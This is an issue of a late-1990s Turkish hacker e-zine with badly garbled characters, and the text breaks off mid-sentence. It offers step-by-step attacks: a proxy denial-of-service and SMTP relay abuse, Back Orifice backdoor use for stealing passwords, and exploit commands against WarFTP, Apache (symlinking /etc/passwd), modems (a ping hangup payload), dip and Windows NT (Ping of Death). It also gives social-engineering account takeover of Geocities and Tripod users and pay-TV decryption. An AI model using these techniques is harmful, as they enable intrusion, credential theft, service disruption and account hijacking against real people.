|
|
 |
 |
|
HACK ONL�NE
|
|
|
|
|
|
HACK ONL�NE
|
 ANA
SAYFA
 HABER
 HACK
 BORSA
 SIK
KUL SOHBET  MAIL  JAVA
SCRIPT KODLARI
 INDIR |
Gazetemizin Web Sayfasy: http://projman.hypermart.net
Her t�rl� irtibat i�in: [email protected]
Bana ICQ'dan ula?mak isterseniz: ICQ Uin: 2726187
T�rk Cracker'lary Gazetesi ------ Sayy ------ 8
Bu gazetenin haklaryyla ilgili bir ka� s�z:
1- Gazetenin herhangi bir b�l�m� kaynak g�sterilmek ?artyyla kullanylabilir.
2- HTML, DOC, TXT vs olarak her t�rl� ortamda serbest�e kullanylabilir, istenildi?i kadar
�o?altylabilir.
3- TCG hi� bir suretle parayla satylamaz.
4- Sadece TCG'nin yazarlary i�erik �zerinde de?i?tirme yapma hakkyna sahiptir.
5- D�k�man �zerinde de?i?iklik yapyp yeniden yayynlanmasy yazarlaryn yazyly izniyle
m�mk�n olabilir.
6- Bu d�k�man kaynak g�sterilmek ?artyyla 3.parti d�k�manlarda
kullanylabilir.Alyntylarda TCG'nin hangi sayysyndan alyndy?y, yazaryn ady, d�k�manyn
orijinalinin nereden bulunaca?y a�yk olarak belirtilmelidir.
7- D�k�manlarda var olabilecek her t�rl� hatadan, yazylanlaryn uygulandy?ynda
do?abilecek maddi/manevi zararlardan dolayy yazarlar herhangi bir sorumluluk kabul
etmezler.
8- Verilen b�t�n bilgiler e?itim ama�lydyr.
9- Bu gazeteyi okuyanlar bu ?artlary aynen kabul etmi? sayylyrlar
Y�erik:
0- Edit�rden.
1- Microsoft Proxy 2.0 D.O.S saldyrysy
2- BO (Back Orrifice)
3- Buglar...Buglar...Buglar
4- Geocities Tripod gibi �cretsiz yer veren siteleri hack etmek
5- Nedir Bu Cine5 Olayy (B�l�m-II)
6- Release Agent Software Cracking
7- Ayyn Tipi
8- Ayyn Programlary
9- Geyik
0- Edit�rden:
Prof. Leonard Kleinrock;
"Veri a?lary �zerine MIT'te (Massachutets Institue of Technology) �aly?malaryna
ba?lady?y yyllarda 'veri a?lary' (data networks) olu?turma hayallari kuruyordu. Kimse
onun birg�n gelecekte bug�nk� adyyla 'Internet' olarak bilinen uluslararasy a?yn en
�nl� yaratycysy olaca?yny bilmiyordu.
Kendisi ve 40 ki?ilik ekibinin 1969 Mayys ayynda y�zlerce ki?i �n�nde yapty?y 'bir
bilgisayardan di?er bir bilgisayara veri veri aktarymy g�sterisi o d�nem i�in yepyeni bir
�a?yn ba?langycy olarak adlandyryldy. Kendisi ve programcy bir �aly?ma arkada?y ile
yapty?y deneme sonucu 'Login' s�zc�?� tarihte bir bilgisayardan di?erine aktarylan ilk
s�zc�k oldu. Yapylan ilk deneme syrasynda Login s�zc�?� girilirken 'g' harfine
gelindi?inde sistem ��km�? olsa da, 'L' ve 'o' harflerinin uzaktaki bilgisayar ekranynda
g�r�lebilmesi iyi bir ba?langy� sayyldy.."
"Internet'in yaratycylaryna binlerce te?ekk�rler. Size �ok ?ey bor�luyuz.."
Bana gelen maillerden ve yapty?ym ara?tyrmalardan bazy veriler ve yorumlar
�ykarttym, Bunlary sizinle payla?mak istiyorum:
Ana sayfadaki �yelik formunu ?imdiye kadar 204 ki?i doldurmu?, bunlaryn %71'i
Internet Explorer kullanyyor (IE'cilerin %65'i T�rk�e browser kullanyyor), Netscape
kullananlar ise %22, %7'lik bir bolumde di?erlerini kullanyyor (opera ve lynx gibi).
�yelerin %30'u efes.net'ten mail almy?, %54'� ise �cretsiz mail hizmeti veren
kurulu?lardan aldyklary mailleri kullanyyorlar. �yeler genellikle 1. kullandyklary mail
adreslerini vermemi?ler (sebebi belki de spamming'den �ekinmeleri) Toplam 387 ki?iyle
ICQ'dan mesajla?yyoruz.
Bu ayki TCG hakikaten dopdolu. T�m yazar arkada?lar b�y�k bir �zveriyle �aly?yp
bilgilerini sizlerle payla?tylar. Syster Nagra kodlu kanallaryn de?ifresi hakikaten �ok
a�yklayycy ve bu alanda yazylmy? T�rkiye'deki ilk yazy oldu. BackOriffice hakkynda
geni? bilgi edinecek, kullanmayy �?reneceksiniz. Microsoft Proxy Server'lara nasyl
saldyryldy?y bir di?er konu, sistem hatalary da ayryca yer alyyor. Rsagent Cracking
ba?lykly yazyyla Rsagent tarafyndan korunan programlaryn nasyl kyryldy?yny
�?renecek, linkler ve ayyn tipini de unutmamak gerek, eh bundan iyisi can sa?ly?y,
sa?lycakla kalyn efendim :) (Projman)
1- Microsoft Proxy 2.0 D.O.S saldyrysy (D�zenleyen Cronos [email protected])
MS-Proxy 2.0 server i�in sa?lam bir DOS attack var!
Bu durum client`yn proxy �zerinden ba?lantysyny abort etmesi ve proxy serverin
remote servera ba?lantysynyn RESET lenmemesi durumunda ortaya cykyyor.
Bu genelde ftp request lerinde kar?yla?ylan bi durum gibi g�r�n�yor.
Mesela saldyran ki?i Web Proxy servisine bir HTTP GET ftp:// request g�ndererek kar?y
hostun 19. portuna (Chargen servisi) ba?lanty yapmaya kalkyp, ("GET
ftp://some.server.com:19/ HTTP/1.0\n\n") Proxy serverdan bir cevap gelmeden
ba?lantyyy iptal eder. Proxy remote servera yapty?y ba?lantyyy a�yk tutar ve data`yy
s�rekli olarak almaya devam eder. Bu da sonu� olarak inetinfo.exe i?lemlerinin %100 de
caly?masyna ve devamly olarak bir hafyza kullanymy arty?yna sebep olur.
25 dakikalyk bir kullanym sonrasy hafyza kullanymy 5000k dan 37000k ya tyrmanyr.
Bu olay NT Server 4 (SP3 + Hotfixler), IIS 3.0 ve nete 33600 kbps ile bagly bir MS
Proxy 2.09 uzerinde test edilmi?tir.
Aslynda bu belkide bir saldyry ama�ly bile olmayabilir - �rne?in, e?er bir kullanycy web
browserindan, A HREF="ftp://some.server.com/bigfile.exe" seklinde linkli, 40mb lik bir
dosyayy download etmeye karar verip sonra Proxy cevap vermeden browserinda STOP a
basarsa bu da ayny etkiyi yapacaktyr. B�yle bir durumda Web Proxy Servis`i Internet
Service Manager`dan durdurulamayacaktyr.
NT Resource Kit`indeki kill.exe`yi kullanyp Web Proxy Servisi killeyip kapatmalysynyz.
Korunma :
a) MS-Proxy's servislerini sadece g�venilen ve yetkisi olan insanlaryn kullandy?yndan
emin olun.
b) Caly?anlarynyzyn i?lerini yapabilmesi i�in ihtiyacynyz olan servislerin dy?ary �yky?
trafi?ini synyrlayyn.�rne?in, paket filter ile dy?aryya cykan her trafi?e izin vermeyin.
Ben Microsoft`dan bu konuda ,client ba?lantysy abort edildi?inde proxy den remote
servera ba?lantynyn da abort edilmesini sa?lyycak bir fix cykarmalaryny isterdim. ��nk�
yukardaki olaylar bazy mu?teriler tarafyndan g�rulemeyebilir.
+-+-+-+-+-
G�r�n�?e g�re sadece MS Proxy de?il hemen hemen t�m web proxyler bu saldyryya
a�yk. Bu konuda yaptyklary testler i�in Greg Jones ve di?erlerine te?ekk�rler. Microsoft's
Proxy Server 2 ile oynarken e?er enabled ise, paketlerin by-pass edilmesine izin vericek
ilgi �ekici bir �zellik buldum.
Exploit, remote host`un belirlenen portuna ba?lanmakla oluyor. �rnekte Web Proxy
servisi uzerinden SMTP portunu (25) kullandym.
Web-proxy TCP port 80 `i dinliyor. Bu porta telnet yapyp bir http request yaptym.
Burda yapmak istedi?imiz servise ait komutlary HTTP headerlary olarak g�ndermek.
A?agyda , web proxy servisine telnet yapyp, GET request`i ile SMTP komutlaryny HTTP
headerlaryymy? gibi kullandym
------------------------------------------8<--------------------------------
telnet web-proxy:80
GET http://smtpmail.globalnet.co.uk:25/ HTTP/1.0
mail from: [email protected]
rcpt to: [email protected]
data :
Subject: Burasi subject satiri :P
Burasyda mesajyn yazyldy?y yer. buraya gelebilmek i�in bir CTRL+J yapmanyz gerek.
Satyra tek bir nokta koymak icin bidaha
CTRL+J yapmanyz gerek.
220 sand2.global.net.uk ESMTP Exim 1.92 #1 Wed, 7 Oct 1998 06:51:37 +0100
500 Command unrecognized
500 Command unrecognized
500 Command unrecognized
250 is syntactically correct
250 is syntactically correct
354 Enter message, ending with "." on a line by itself
250 OK id=0zQmVd-0007md-00
500 Command unrecognized
500 Command unrecognized
Burdaki olay, proxy`nin, ba?ynda : olan bir satyry gidice?i yere g�ndermesi. Proxy
ayryca kendi HTTP headerlarinida ekler (Via: proxy_ismi, Host: final_destiantion,
Connection: Keep-Alive) ki bu y�zden bazy "Command Unrecognised" lar g�r�yoruz.
FTP yada POP3 t�r� bir servis i�in b�t�n komutlary bi arada yapabilirsiniz.
GET http://herhangi.bir.server:21_or_110/ HTTP/1.0
:(CTRL+J)
user birisi(CTRL+J)
pass bi?iler(CTRL+J)
stat(CTRL+J)
etc = etc ve ENTER a basarak bitirin.
Not- her?ey biriktiriliyor ve enter`a iki kere basty?ynyzda hedefe bir kerede gidiyor.
Hedef headerlary buffer`liyor ve onlary syrasyyla yapyyor. Yani kysaca komutlarymyzy
proxy`ye HTTP headerlar`y gibi g�sterip ge�iriyoruz.
Evet, bu nasyl oldu?u, ?imdi bununla neler yapilabilir?
Konfig�rasyonuna ba?ly olarak, sadece port 80`e gelen requestlere izin veren bir proxy
server �zerinden saldyran ki?iler servislere ve makinelere eri?ebilirler. Proxy`ye bi kere
girdi?inizde requestler, "korunmu?" lokal a?ynyza, paket filter yokmu? gibi gidebilir.
Herkesin eri?imine a�yk proxylerden internetteki di?er makinalara saldyrylar yapylabilir
ve hedef makinada saldyranyn kendi IP si g�r�nmez.
Bu atak IP adresine dayaly izinlerle i?leyen g�venlik sistemlerine kar?y kullanylabilir.
Aslynda bu olay daha bir�ok ?ekilde yapylabilir. En son olarak size a?a?ydaki gibi bir
��z�m �nerebilirim.
Proxy portunu degi?tirmek bir i?e yaramyyaca?yndan bunun yerine proxy`nin
bilinmeyen headerlary filtrelemesini sa?lamalysynyz.
�rne?in, �o?u browser bir "User-Agent" header`i belirler-proxy bunu ge�irmeli- ama
"mail from: [email protected]" gibi standart olmayan bir HTTP header`i remove etmesi
lazym. Ayryca hex de?eri \x08 (CTRL+J) olan headerlary da cykarmaly. (A?a?ydaki
olayyn gercekle?memesi i�in)
User-Agent: Mozilla/2.0(CTRL+J)
Komut 1(CTRL+J)
Komut 2(CTRL+J)
Komut 3(CTRL+J)
falan filan
Cheers and l8r
-Original Message by Mnemonix-
2- BO (Back Orrifice) (D�zenleyen Kaiowas [email protected])
A?ustos 98 de,bazy Windows backdoorlary teker teker ortaya �ykty.Backdoor,hedef
belirtilen sistemde kendini saklayan programlara denilir.Bu programlar
genellikle,sisteme izinsiz remote olarak girilmesini sa?larlar.
"Cult Of Dead Cow" adyndaki bir hacker grubu bir s�re �nce Windows 95/98 i�in
"BackOrifice" isminde bir backdoor geli?tirdi.Bu backdoor bir kere sisteme
y�klendiginde,izinsiz kullanycylaryn sisteme girmelerini ve sistemde tam yetki
almalaryny sa?lyyor.
BackOrifice da bir �ok backdoor gibi sistemden silinebilir.Ama silmeyi �?renmeden �nce,
gelin hedef se�ilen sistemde nasyl �aly?ty?yny g�relim.
"BackOrifice Server" kar?y sisteme g�nderilip �aly?tyryldy?ynda ?unlary yapyyor;
* B.O Server,ilk olarak kendisini bulundu?u yerden silerek,Windows sistem directorysine
kopyalyyor. (c:\windows\system)
* Daha sonra,
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices"
altynda server programynynda belirtildi?i bir kayyt anahtary olu?turuyor.
* Bundan sonra,sistem 31337 numaraly yeni bir UDP portu a�yyor.
BO ger�ekten,gerek Netbus,gerek Masterz Paradise,gerekse ba?ka bir Remote
Administrative programyna g�re �ok daha karma?yk.Onun i�in kullanycy,�o?u zaman BO
Server i kendi makinesinde �aly?tyrabilir.Bunun olup olmady?y ?u ?ekilde
�?renebilirsiniz,
* Regedit programyny a�yn,
* "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices"
deki anahtarda boyutu 124,928 olan bir dosya g�r�rseniz,sisteminiz de BackOrifice
y�kl� :)
Bundan ba?ka NetStat programyny kullanarak sisteminizde BO nun y�kl� olup
olmady?yny �grenebilirsiniz.
'netstat -an' komutu sistemdeki t�m a�yk portlary dinler.E?er ortada a�yk bir UDP portu
varsa sistemde BO y�kl�.
C:\WINDOWS>netstat -an | find "UDP"
UDP 0.0.0.0:31337 *:*
G�rd�?�n�z gibi 31337 nci port a�yk bir UDP portu.Aslynda bu port 31337 olmak
zorunda de?il. 31338,31331 de olabilir.Ama hepsi ?�pheli tabi :) BO dan kurtulmak
hakkynda ,daha fazla bilgi i�in http://www.nwi.net/~pchelp/bo.html ye bakyn.
?imdi BO dan nasyl kurtulaca?ymyzy �?rendik,biraz da olayy di?er taraftan
izleyelim,Attacker biziz yani :) ?imdi,BO paketini aldy?ynyzda,Readme dosyalaryny ilk
�nce okumanyzy �neririm,��nk� ortada bir �ok dosya g�receksiniz,hangisinin
server,hangisinin client oldu?unu bilmek gerek :)
Cult Of Dead Cow(cDc) grubu ,BO i�in d�rt tane plug-in yapmy?.Ylk bunlary g�steriyim.
- Speak Easy - Bu Plug-in'i IRC kelekleri �zerinde kullanyyoruz.Gizlice kar?yya
ge�iyor,ve kendini �aly?tyryyor.
- Silk Rope - Kendini ,bir programyn i�ine gizliyor.
- Saran Wrap - Kendini,herhangi bir Install programynyn i�ine gizliyor.
- Butt Trumpet - Backdoor bir maile ba?lanyp gidiyor.Kurban,maili a�ty?ynda,backdoor
aktivite oluyor.
Y?te plug-inler bunlar.Bunlary kullanarak BO yu daha kolayla?tyrabilirsiniz.BO yu
http://www.cultdeadcow.com den download edebilirsiniz.Fakat oradaki bazy
programlaryn da g�vensiz oldu?unu s�ylemek zorundayym. Mesela BOSniffer adynda bir
program dan bahsedildi?ini g�receksiniz.O bir backorifice,onun i�in download etmeye
kalkmayyn.Ayryca "theipspoof.zip" gibi bir dosya bulursanyzda sakyn Unzip etmeyin,
��nk� o da ayry bir backorifice.Y?te Back Orifice efsanesi bu.
(Hangi Komut Ne Y?e Yarar?)
Help: yardym
Copy: kopyalama
Dir: dosyalary listeler
Cd: klas�rler arasynda ge�i? (cd windows)
Md:klas�r yaratma (md mehmet)
Del: silme (del ahmet.exe)
Reboot (sistemi resetleme)
Passes (ADAMIN B�T�N PASSWORDLERYNY ALMA)
Sound mound gibi daha onlarca komutu help yazarak �renebilirsiniz!
(Adamyn bilgisayaryna Boclient i �aly?tyrmadan yine programla gelen BoGui adly
programlada girebilirsiniz.BoGui grafiksel arabirimlidir.Target host yerine adamyn ip
numarasyny yazyn ve istedi?iniz t�mleci se�in ve send e basyn .)
3- Buglar...Buglar...Buglar (D�zenleyen Kaiowas [email protected])
Sistem : Win 95/98/NT
Program : WarFTP Daemon
Bazy dergilerin bu daemon i dergi CD lerinde verdiklerini g�rd�m.Dolayysyyla bir �ok
kelek bu programy kullanycak :) ?imdiii....
Ylk olarak ftp liyorsunuz(21).
Sonra username kysmyna,
User : abel�h�b�l�zappuruzuppurusizigidilamerlarhobad�kvayanasyna (yada bunun
kadar uzun ve aptal bir username :) )
giriyorsunuz,ve password kysmyna da,
Password : abel�h�b�l�zappuruzuppurusizigidilamerlarhobad�kvayanasyna (yada
bunun kadar uzun ve aptal bir password :) )
giriyorsunuz.
Ve sistemi a??a?y davet etmi? oluyoruz.
Tabii patch ide bulunuyor.(heheh)
+-+-+-+-+-+-+-+
Sistem : Linux
Program : Apache 1.1.3
Apache baya?y iyi,ve �nl� bir http daeomon'i,ama tabiiki,bug'i yok degil :)
Apache,�aly?tyryldy?ynda,"/tmp/apache_status" gibi bir dosya yaratyyor.Ve bu dosya
aptal gibi her link i izliyor.Bu dosyayy,mesela "/etc/passwd" e a??a?yda g�r�ld�?� gibi
static linkleyebiliriz.
$ ln -s /etc/passwd /tmp/apache_status
+-+-+-+-+-+-+-+
Ping in modem �zerinde yetkisi
Bug,modem ile ilgili,"+ + +ATH0" komutu,modem e hangup sinyalini yollar.Siz
Windows ta,internet ten �ykmak i�in "Disconnect" e tyklady?ynyzda,aslynda modem e
"+ + +ATH0" sinyalini yollamy?, olursunuz.
�ncelikle kendimize bir kurban bulalym,sonra hemen komutumuzu yazalym :)
$ ping -p 2b2b2b415448300d 000.000.000.000
Tamam ,anladym,hi� bir?ey anla?ylmyyor komutdan,ama ?imdi a�yklayaca?ym :))
Kar?y tarafa ping yolluyoruz.Ama bu garip bir paket boyutu,"2b2b2b415448300d".
?�yle diyim,"2b2b2b" ,"+ + +ATH0" yn,HEX kod'u."000.000.000.000" yerine de
kurbanyn IP sini yazycaksynyz.
Ayryca , bu yolu kullanarak,kurbanyn ba?ka yerlere telefon etmesi gibi bir �ok ?eyi
yaptyrabilirsiniz.
+-+-+-+-+-+-+-+
Sistem : Linux
Komut : /usr/sbin/dip
"dip",Linux ta bulunan bir Dial-up programy.George Staikos un "dip" te buldu?u bug
sayesinde herhangi bir kullanycy "/dev" dizininde yetki sahibi olabiliyor.
�rnek :
$ whoami
kaiowas
$ cat < /dev/tty1 <------ root un loginledi?i yer
bash: /dev/tty1: Permission denied <------ bunu a?abiliriz
$ dip -t
DIP: Dialup IP Protocol Driver version 3.3.7o-uri (8 Feb 96)
Written by Fred N. van Kempen, MicroWalt Corporation.
DIP> port tty1
DIP> echo on
DIP> term
[ Entering TERMINAL mode. Use CTRL-] to get back ]
rootun_?ifresi <------ ?ansynyz varsa tabii :)
[ Back to LOCAL mode. ]
DIP> quit
$
Korunma :
chmod u-s /usr/sbin/dip
+-+-+-+-+-+-+-+
Program : PC Anywhere
Sistem : PC Anywhere 8.0 y�kl� WinNT (Belki ba?kalaryda..)
PC Anywhere,bilindi?i gibi bir �ok dergi tarafyndan,da?ytylmy? bir "share" programy..
Cain Tasam,bu program �zerinde ?�yle bir bug bulmu?.E?er PC Anywhere Server ynyn
�aly?ty?y bir sistemin 5631. portuna telnetlerseniz.PC Anywhere ��k�yor.Bu,tamamen
patchleri y�kl� bir WinNT 4.0 sistemde bir ka� ki?i tarafyndan denendi.Deneyen ki?ilerin
s�yledi?ine g�re sistem birinci telnet sezonunda ��km�yor.Ykinci ve ���nc� sezonlarda
bu bug harekete ge�iyor.
+-+-+-+-+-+-+-+
Komut : "Ping of Death"
Sistem : WinNT 3.51,4.0
�ok b�y�k paketteki pingler (PING -l 65527 -s 1 hostname) yada Underground tabiriyle
"�l�m�n Ping'i" ,WinNT 3.51 sistemlerde o me?hur mavi ekran y ortaya �ykartyyor...
Ayny ?eyi WinNT 4.0 da yiyor,fakat 3.51 kadar basit mavi ekran y ortaya �ykarmyyor.
Windows based i?letim sistemlerinde bu hata �ok g�r�l�yor.Bu bir D.O.S atak
sayylabilir. Denemek isteyenler i�in komut :
ping -l 65524 host.domain.com
Korunma : "�l�m Ping'i" ni durdurmak o kadar zor de?il.En son service packler yada
updateler kullanylarak bu sorunu ortadan kaldyrabilirsiniz.
Windows NT 4.0 i�in,
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/
Windows NT 3.51 i�in,
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt351/
Windows 95 i�in,
http://www.microsoft.com/windows/common/contentW95UGA.htm
4- Geocities, Tripod gibi �cretsiz yer veren siteleri Hack Etmek (D�zenleyen
RealTarrasque [email protected])
Bi web sayfasyny hack etmenin en kolay yolu Backoffricele adama ba?lanyp email
?ifresini �almaktyr..e?er sayfa xoom tabanly filansa zaten Backoffrice sayfanyn ?ifresini
size g�stericek diilse adamyn int. ?ifresini alyn passes komutuyla email adresi ?ifresiyle
aynydyr daha sonra ise Geocities ,xoom ..ya mail attyn bunlaryn hepsinde ?ifremi
unuttum email adresime postalayyn b�l�m� vardyr o b�l�mden mail atyn 5 dakka sonra
adamyn mail hesabyna girin..o kadar basit.
Geocitiesi HACK etmek i�in �nce Hotmail gibi bi yerden bi email adresi alyn sonra
Geocities adreslerini tarayyn sayfanyn sahibinin ad soyad do?um tarihini ve email
adresini veren bi sayfa bulun. www.geocities.com/SiliconValley/1001 den ba?layyn 1002
1003.....tarayyn.tataa buldunuz ?imdi http://www.geocities.com/help/pass_form.html
adresine gidin (bu adres de?i?mi? olabilir ama daima geocities in i�inde help
b�l�m�ndedir!)Formda Geocities in database indeki email adresini sordu?unda adamyn
amil adresini yazyn ve daha sonra yeni emaili i?aretleyin ve Hotmailden aldy?ynyz email
adresini yazyn ve daha sonra hotmaile u?rayyn aa ?ifreyi g�ndermi?ler.
Ama g�ndermeyede bilirler kesin bi ihtimal diildir bu (yoksa her �n�ne gelen
geocitiesi kyrardy )E?er geocitiesdeki y�netici sandy?ymyzdan daha akyllyysa adama
mail atyn ve yanly?lykla ?ifreyi de?i?tirdi?inizi ve email adresiniziz de?i?ti?ini s�yleyin
e?er ?ifreyi de?i?tirdi?inizi duyarlarsa ailenizin sizi �ld�rece?ini s�ylemeyi unutmayyn!
E?er adamyn �zellikleri websayfasynda yoksa sayfanyn sahibine mail atyn kalem
arkada?y olmak istedi?inizi s�yleyin ve adamy kafaya alyp b�t�n �zelliklerini alyn ve
formda yerine yazyn =)
TRYPODU KIRMAK
Tripod'u kyrmak i�in sadece internet hesabyna ve 1-2 hafta s�reye ihtiyacynyz
var.�nce adamyn Tripoid user nameine ihtiyacynyz var.
http://members.tripod.com/~username (user name bu adreste en sona yazdy?ynyz
i?te)sonra adamyn ger�ek ismini �?renmelisiniz:
http://www.tripod.com/planet/profile/search.html adresinden adam hakkynda bildi?iniz
her?eyi yazarak �?renebilirsiniz e?er member profile girebilirseniz adam hakkyndaki
her?eyi �?reniceksiniz city,country...E?er bu adresten bulamazsanyz adam buraya bi
member profile koymamy? demektir o zaman Icq dan info �ekin adama =)
"If you need to change your email address, please contact us at
[email protected] with your new email address. Please include your member
name, old email address, and full name in the message."
**************************************end
Bu yazyda diyoki email adresinizi de?i?tirdiyseniz kullanycy adynyzy ve eski email
adresinizi t�m isminiz ve soyisminizi yazyn vve yeni email adresinizi (hotmailden
aldy?ynyzy)Sonra size b�yle bi email gelicek
Dear "User", Thank you for informing us of your new email address. We have updated
your membership information:Tripod member name: eskikullanycyady (unchanged)
New email address: [email protected] (yeni adres)
Bu kadaaaaaar =)?ifrede gelicek tabii..
5- Nedir Bu Cine5 Olayy (B�l�m-II) (D�zenleyen MR-X)
Syster Nagra Kodlu Kanallaryn De?ifresi
1.Gerekenler
1. MMX komutlaryny i?letebilecek (Pentium , PII , Celeron , AMD K6 , AMD K6-2 , Cyrix
MX vs.) i?lemcili , yeterli i?lem g�c�ne sahip bir bilgisayar ve full duplex ses karty .
PubS yn MMX isteyip istemedi?inden emin de?ilim. Renk i�in bir MMX no MMX ayary var
ama bu sadece renk i�in mi yoksa di?er i?ler i�in de MMX gerekiyor mu bilmiyorum.
Deneyip g�r�n.
Denemelerim 166MMX i?lemcili 32MB Ram ly S3 V+ ekran kartly bir makine ile Syster
4.6 programy kullanylarak d�?�k ��z�n�rl�kte de olsa bu i? i�in kullanylabilece?ini
g�sterdi. Main board yn da en azynda 512K cache i olmasy lazym. Makinenizin g�c�
yetmez ise g�r�nt� hyzy d�?er veya sesler kesik kesik gelmeye ba?lar. Main boardyn da
cache b�y�kl�?� dy?ynda adam gibi bir ?ey olmasy hyzy arttyrycy bir fakt�r. Benzer
�zelliklerdeki iki MB arasynda 13fps fark g�rd�m ki bu ciddi bir rakam.Bu konuya ileride
yine de?inilecektir.
Celeron lar dahil PII serisi maksimum performans veriyor.
2. �zerinde Bt848/Bt849/Bt878/Bt879 chiplerinden biri olan capture �zellikli bir TV
karty , aslynda gereken �zerinde bu entegrelerden biri bulunan bir capture karty. Ancak
capture kartlarynyn �zerinde Tuner olmady?y i�in antenden gelen yayyny do?rudan
ba?layamazsynyz. Bir ?ekilde baseband i?aret vermeniz gerekir. Bu da her zaman
m�mk�n olmady?y i�in capture �zelli?i olan TV kartlary kullanylyyor. Piyasada
bulunabilecek benim bildi?im kartlar ve haklaryndaki yorumlarym a?a?ydadyr :
1.Hauppauge WinTV : PC Word TV karty testinde de belirtildi?i gibi genel olarak g�r�nt�
kalitesi �ok iyi. Ancak ayny �zelliklerdeki di?er kartlarla kar?yla?tyryldy?ynda biraz
pahaly. Standart versiyonunda ne uzaktan kumanda ne de FM se�ene?i var. Uzaktan
kumanda i�in -galiba- 50$ fark istiyorlar. Eski modellerinde Bt848 yenilerinde Bt878
kullanylyyor.
2.Avermedia TV Phone:Benim ve pek �ok ki?inin kullandy?y kart. Uzaktan kumanda , FM
, Teletext hepsi var ve bu �zelliklerdeki kartlar arasynda sanyrym en makul fiyata sahip.
?ifre ��z�c� programlaryn hemen hemen hepsi ile denedim , bir sorun �ykartmady.
G�r�nt� kalitesi de iyi. Win98 altynda kullanacak arkada?laryn Aver'in web sitesinden
Win98 s�r�c�lerini indirip kullanmasyny hararetle tavsiye ederim. (Bu arada Win95 in
suyu mu �ykty ? :-) )
3.Miro PC TV : Kullanmadym ama ?ikayet�i olanyny da duymadym. Miro , Hauppauge
gibi bir Alman firmasy ve grafik konusundaki �r�nleriyle tanynyyor. Bazy sitelerde Miro
nun bazy modellerinin bu i? i�in uygun olmady?yny okumu?tum ama tam detaylary
bilemiyorum. Fiyaty pek ucuz de?il.
4.Fly Video II : Kullananlar i? g�rd�?�n� s�yl�yorlar. Askey le beraber bu listedeki en
hesaply kart. UK + TXT var , FM yok.
5.Askey Magic : Bir ara elime bir tane ge�mi?ti. Ucuz bir kart ve i? g�r�yor.
6.Winview 601 : Uzak durun. �?renebildi?ime g�re artyk pek ithal edilmiyor. Temelde
�aly?sa da ses konusunda sorun �ykartyyor.
3.?ifre kyrycy bir program: Ortalykta bir s�r� program var. Neredeyse hepsi de DirectX
kullanyyor. Bu nedenle sisteminizde DirectX 5.0 ve �st?n?n kurulu olmasy lazym.Bu
programlaryn belli ba?lylary PC TV: Bu tip programlaryn ilki herhalde PCTV idi. PCTV
mmx i?lemciye ihtiya� duymayan nadir programlardan biri. Ancak kullanmasy �ok zor.
Bir de bu i?ler genelde Alman'laryn elinde oldu?u i�in Ingilizce bir dokuman bulmak zor.
Kullanamdym , pek te niyetim yok.
Win TV: En son versiyonu 2.0(d) renkli ama ses yok. U?ra?maya de?mez.
Free TV: Son olarak 6.0'y �ykty herhalde. A�yly?y �ok uzun , renk var ses yok. �zerinde
durmaya pek de?mez.
MoreTV : Yeni bir program ama PubS ve Syster dururken hi� denemedim , niyetim de
yok.
Syster4.6:�e?itli versiyonlary mevcut , en son versiyonu 4.6 . PubS gelene kadar en
iyisi idi. Halen sesi do?rudan ��zebilen tek program. Renkli + Ses var. Ses kalitesi
harika de?il ama kullanymy kolay. Di?er programlar i�in de gereken key.txt dosyalary
Syster4.0 paketinin i�inde. Program indidirken 4.0 versiyonu indirmeyi de unutmayyn.
PubS : ?u an i�in kyrycy programlaryn kraly. G�r�nt� kalitesi harika , her g�zelde
oldu?u gibi bir kusuru var ses �zelli?i yok. Ses i�in ayry bir program kullanmak
gerekiyor. �ok user- friendly oldu?u da s�ylenemez ama hepsine de?er. ?u an benim de
kullandy?ym program. Ylk �ykan versiyonu 0.904 te bazy sorunlar vardy. Bir iki patch
�ykartyldy. En son patch 2.0 . Asyl programla beraber patch i de indirmeyi unutmayyn.
Bu programlar -Syster hari�- sadece video decoder lar. Bir de sadece sesi decode eden
programlar mevcut. Ses �zelli?i olmayan programlarla beraber bu programlary
kullanarak seslendirebilirsiniz.
CPlusWin: Ylk ses decodery. Bende pek kaliteli sonu� vermedi ama memnun olanlar var.
NGSound: Cpluswin'den daha iyi , hemen hemen syster kalitesinde ses veriyor.
NSCodec: Ses kalitesi �ok iyi bir program. Al�ak ge�iren filtreyi de eklemi?ler. Ama
i?lemciye fazla y�klendi?i i�in sistemi yava?latyyor. Celeron veya PII niz varsa g�n�l
rahatly?y ile kullanabilirsiniz.
E?er Celeron , PII veya kuvvetli bir MMX i?lemciniz (233 MHz ve �st�) yok ise ses
decodery olarak program yerine bir elektronik devre kullanmak daha makul bir ��z�m
olur. Nedeni sadece ses kalitesi de?il , ses decoderlarynyn video hyzyny ciddi ?ekilde
d�?�rmesidir.
Peki bu programlary nereden bulaca?yz ? En populer sayfa FreeTV sayfasy. Adresi ara
syra de?i?iyor ama en son adresi http://www.randy.msing.de/mediamaster/ idi. Bu
adres �aly?mazsa FreeTV nin di?er URL lerini listesini
http://www.klaubach-dbox.de/freetv/files/freetvurl.htm den bulabilirsiniz.
Genel pay tv hacking konulary ile u?ra?an http://www.eurosat.com ve sadece yazylym
decoderlary ile u?ra?an http://www.eurosat.com/salp/ adresleri de di?er ilgili sayfalar.
2.Adym adym bu i? nasyl yapylyr ?
Di?er programlary bir yana byrakyp sadece Syster ve PubS programyyla bu i?in nasyl
yapyldy?yny anlataca?ym.
1.TV kartynyzy ve DirectX5.0 (yada �st�n�) bilgisayarynyza kurun. TV kartynyzy
istedi?iniz gibi ayarlayyp �aly?yr hale getirin.
2. http://www.randy.msing.de/mediamaster/ adresinden
i)Syster 4.0 ve Syster 4.6 - ?imdi baktym da FreeTV syster 4.0 y kaldyrmy?. Syster 4.0
i�in http://www.bildung.net/syster/softwarn.htm adresini kullanabilirsiniz.-
ii) PubS ve DekPatch
iii)NGSound , NSCodec ve CPluswin dosyalaryny indirin.
3. Uygun directory ler i�ine programlary a�yn. Syster4.6 yy a�ty?ynyz yere Syster4.0
i�indeki �� Key.txt dosyasyny da a�yn.
4. ?imdi �nemli bir adym. Ses i�in gerekli. Sa? alttaki k���k hoperlor simgesine �ift
tyklayyn.
Kar?ynyza gelen pencerede Line-in g�r�nm�yorsa
Se�enekler>�zellikler>Kayyttan Y�r�tme i�in de Line-in in yanyny i?aretleyin ve Tamam
